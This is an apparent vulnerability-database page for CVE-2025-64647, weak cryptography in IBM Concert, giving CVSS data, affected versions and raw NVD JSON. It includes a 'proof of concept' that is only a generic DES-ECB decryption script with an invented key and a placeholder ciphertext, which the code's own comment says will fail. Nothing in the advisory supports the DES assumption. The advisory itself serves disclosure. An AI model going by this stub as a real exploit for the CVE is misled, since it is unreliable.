Security Vulnerability Report
CVE-2025-64647 CVSS 5.9 MEDIUM

CVE-2025-64647

Published: 2026-03-25 21:16:26
Last Modified: 2026-03-26 17:49:08

Description

IBM Concert 1.0.0 through 2.2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
IBM Concert 1.0.0
IBM Concert 1.0.1
IBM Concert 2.0.0
IBM Concert 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import binascii

from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

# Proof of Concept for CVE-2025-64647: Weak Cryptography
# Demonstrates decryption using a weak algorithm (DES) and short key.


def decrypt_weak_cipher(encrypted_hex, key):
    """Decrypt hex-encoded DES-ECB ciphertext with an 8-byte key and strip the padding."""
    try:
        cipher = DES.new(key, DES.MODE_ECB)
        encrypted_data = binascii.unhexlify(encrypted_hex)
        decrypted_data = unpad(cipher.decrypt(encrypted_data), DES.block_size)
        return decrypted_data.decode('utf-8')
    except Exception as e:
        return f"Decryption failed: {e}"


# Example usage simulating exploitation
if __name__ == "__main__":
    # Simulated intercepted ciphertext and weak key
    # Placeholder, not valid hex: unhexlify() raises and the failure message is returned
    target_ciphertext = "encrypted_data_here"
    weak_key = b"WeakKey1"
    plaintext = decrypt_weak_cipher(target_ciphertext, weak_key)
    print(f"[+] Decrypted sensitive data: {plaintext}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64647", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:25.823", "lastModified": "2026-03-26T17:49:07.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information"}, {"lang": "es", "value": "IBM Concert 1.0.0 hasta 2.2.0 utiliza algoritmos criptográficos más débiles de lo esperado que podrían permitir a un atacante descifrar información altamente sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1240"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "2.2.0", "matchCriteriaId": "2E37B307-BAA4-487B-958B-7354E39D7B2A"}]}]}], "references": [{"url": 
"https://www.ibm.com/support/pages/node/7267105", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}